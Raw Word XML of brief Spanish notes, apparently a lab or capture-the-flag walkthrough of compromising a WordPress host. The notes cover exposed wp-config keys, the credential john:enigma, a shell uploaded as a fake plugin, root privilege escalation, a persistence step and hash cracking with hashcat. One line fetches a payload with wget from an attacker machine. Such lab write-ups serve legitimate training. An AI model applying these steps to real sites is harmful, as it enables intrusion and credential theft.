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167640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="3375025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4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374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        </w:t>
      </w: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5194300"/>
            <wp:effectExtent l="0" t="0" r="0" b="6218"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2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"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5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5194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170815</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>161290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="3576320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5182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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6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576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361315</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>146050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5304790" cy="1437640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="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7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4983" cy="1437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-99695</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="3327400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6249"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="5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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8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327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257550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides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/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9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257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5053965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10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5054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  <w:r>
        <w:t xml:space="preserve">Llegamos a la pagina </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.1.243/backup_wordpress/" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>http://192.168.1.243/backup_wordpress/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>tiene un logon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684010" cy="2000885"/>
            <wp:effectExtent l="0" t="0" r="2469" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11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4081" cy="2000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  <w:r>
        <w:t>usuario validos admin y john</w:t>
      </w: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371850" cy="2700655"/>
            <wp:effectExtent l="0" t="0" r="92" b="4420"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="9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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12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758" cy="270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652780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="10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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13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652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879725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="11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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14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879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si pulsas en repait.php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049780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7590"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="12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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15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04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si pulsas en el enlace, te da las clves maestras q usas wordpress para cifrar y autenticar sesiones de usuario y tokens de inicio de woerppress. Asi que vamos a descifrarlas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615440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3963"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="13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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16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615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Style w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">laves de autenticación y sales.- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">n el archivo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
        </w:rPr>
        <w:t>wp-config.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>, generadas aleatoriamente y se utilizan para mejorar la seguridad de WordPress en su autenticacion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Cifrar las cookies de autenticación de los usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Asegurar que las sesiones</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> no puedan ser falsificadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Proteger los tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de autenticación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/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43840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3963"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="14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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17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43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john:enigma, con el entro y modifico la contraseña del admin y entro como admoin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>--entre las opciones de la web hay una d e subir plugin personales del dispositivo local, por lo quu creo un plugin simulado valido para wordopress, añadiendole a una shellun comentario de encabezado y comprimiendolo en un .zip.</w:t>
      </w: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-106045</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-3810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="1685925"/>
            <wp:effectExtent l="0" t="0" r="0" b="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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18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685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-119380</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-353060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="1548765"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="16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/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19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548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  <w:r>
        <w:t>Se le de activate plugin</w:t>
      </w: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418590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="17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/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20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418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085850"/>
            <wp:effectExtent l="0" t="0" r="0" b="92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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21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085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5039360"/>
            <wp:effectExtent l="0" t="0" r="0" b="8992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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22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50392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802765"/>
            <wp:effectExtent l="0" t="0" r="0" b="6828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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23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802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  <w:r>
        <w:t>me permite copiar un archivo con permisos root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/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52440" cy="580390"/>
            <wp:effectExtent l="0" t="0" r="0" b="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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24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2236" cy="580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modificammos y sobreescribimos una shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/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748665"/>
            <wp:effectExtent l="0" t="0" r="0" b="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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25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748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032125"/>
            <wp:effectExtent l="0" t="0" r="0" b="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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26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3032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 </w:t>
      </w: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337310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27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337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314450"/>
            <wp:effectExtent l="0" t="0" r="0" b="92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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28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314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02005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="26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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29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802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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/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238250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="27" name="Image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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30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23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5"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.1.134:4444/cleanup" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>http://192.168.1.134:4444/cleanup</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>PERSISTENCIA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
      </w:pP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618615"/>
            <wp:effectExtent l="0" t="0" r="0" b="671"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="28" name="Image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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31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618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 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>USR/BIN → LO SUBO</w:t>
      </w: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572895"/>
            <wp:effectExtent l="0" t="0" r="0" b="8291"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="29" name="Image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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32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572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 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/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413000"/>
            <wp:effectExtent l="0" t="0" r="0" b="6249"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="30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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33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2413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  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>comprobacion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/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639445"/>
            <wp:effectExtent l="0" t="0" r="0" b="8352"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="31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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34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639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persitencia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang/>
        </w:rPr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053465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="32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/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"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87" cy="1053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default"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w: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  <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang/>
        </w:rPr>
        <w:t>intentamos extraer hashenado el resto de usuarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6118225" cy="1423670"/>
            <wp:effectExtent l="0" t="0" r="15875" b="508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  <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang/>
        </w:rPr>
        <w:t>hacemos un archivos sin los nombre para pasarlo a hashcat( hash_sin_user)</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6114415" cy="333375"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525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la funcionalidad de monitoreo del ventilador de la GPU no está soportada en tu sistema o hardware.</w:t>
      </w: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  <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang/>
        </w:rPr>
        <w:t>resultado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6113145" cy="582295"/>
            <wp:effectExtent l="0" t="0" r="1905" b="825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after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134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C059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FreeSans">
    <w:panose1 w:val="020B0504020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E493BEFF" w:usb1="0640FDFF" w:usb2="0A4030A1" w:usb3="0200058C" w:csb0="600001BF" w:csb1="DFF7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Noto Sans">
    <w:altName w:val="Quicksand Light"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000021" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Quicksand Light">
    <w:panose1 w:val="00000400000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="2000000F" w:usb1="00000001" w:usb2="00000000" w:usb3="00000000" w:csb0="20000193" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="等线">
    <w:altName w:val="Quicksand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iberation Sans">
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E0000AFF" w:usb1="500078FF" w:usb2="00000021" w:usb3="00000000" w:csb0="600001BF" w:csb1="DFF70000"/>
  </w:font>
  <w:font w:name="Liberation Mono">
    <w:panose1 w:val="02070409020205020404"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E0000AFF" w:usb1="400078FF" w:usb2="00000001" w:usb3="00000000" w:csb0="600001BF" w:csb1="DFF70000"/>
  </w:font>
  <w:font w:name="OpenSymbol">
    <w:altName w:val="Quicksand Light"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="02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DDB42AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6DDB42AD"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="709" w:hanging="283"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1418" w:hanging="283"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2127" w:hanging="283"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2836" w:hanging="283"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3545" w:hanging="283"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4254" w:hanging="283"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4963" w:hanging="283"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5672" w:hanging="283"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6381" w:hanging="283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709"/>
  <w:autoHyphenation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</w:compat>
  <w:rsids>
    <w:rsidRoot w:val="0070609A"/>
    <w:rsid w:val="005A4C8F"/>
    <w:rsid w:val="0070609A"/>
    <w:rsid w:val="7BFF12BA"/>
    <w:rsid w:val="8FA77F67"/>
    <w:rsid w:val="CA5F4A0F"/>
    <w:rsid w:val="D8FBED7D"/>
    <w:rsid w:val="E4F56301"/>
    <w:rsid w:val="EA75D3A3"/>
    <w:rsid w:val="EFFF3FF7"/>
    <w:rsid w:val="FDDF464D"/>
    <w:rsid w:val="FF7F8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uppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Sans" w:cs="FreeSans"/>
      <w:kern w:val="3"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="5"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:spacing w:before="140"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
      <w:b/>
      <w:bCs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Heading"/>
    <w:basedOn w:val="4"/>
    <w:next w:val="5"/>
    <w:uiPriority w:val="0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4">
    <w:name w:val="Standard"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Sans" w:cs="FreeSans"/>
      <w:kern w:val="3"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5">
    <w:name w:val="Text body"/>
    <w:basedOn w:val="4"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="caption"/>
    <w:basedOn w:val="4"/>
    <w:next w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="List"/>
    <w:basedOn w:val="5"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="10">
    <w:name w:val="Index"/>
    <w:basedOn w:val="4"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="Internet link"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="000080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="Strong Emphasis"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="Source Text"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Liberation Mono" w:cs="Liberation Mono"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="14">
    <w:name w:val="Bullet Symbols"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:eastAsia="OpenSymbol" w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="Numbering Symbols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Essential">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="D1282E"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="C8C8B1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="7A7A7A"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="F5C201"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="526DB0"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="989AAC"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="DC5924"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="B4B392"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="CC9900"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="969696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204</Words>
  <Characters>1164</Characters>
  <Lines>9</Lines>
  <Paragraphs>2</Paragraphs>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1366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2024-10-14T07:36:00Z</dcterms:created>
  <dc:creator>vice</dc:creator>
  <cp:lastModifiedBy>vice</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-14T03:10:59Z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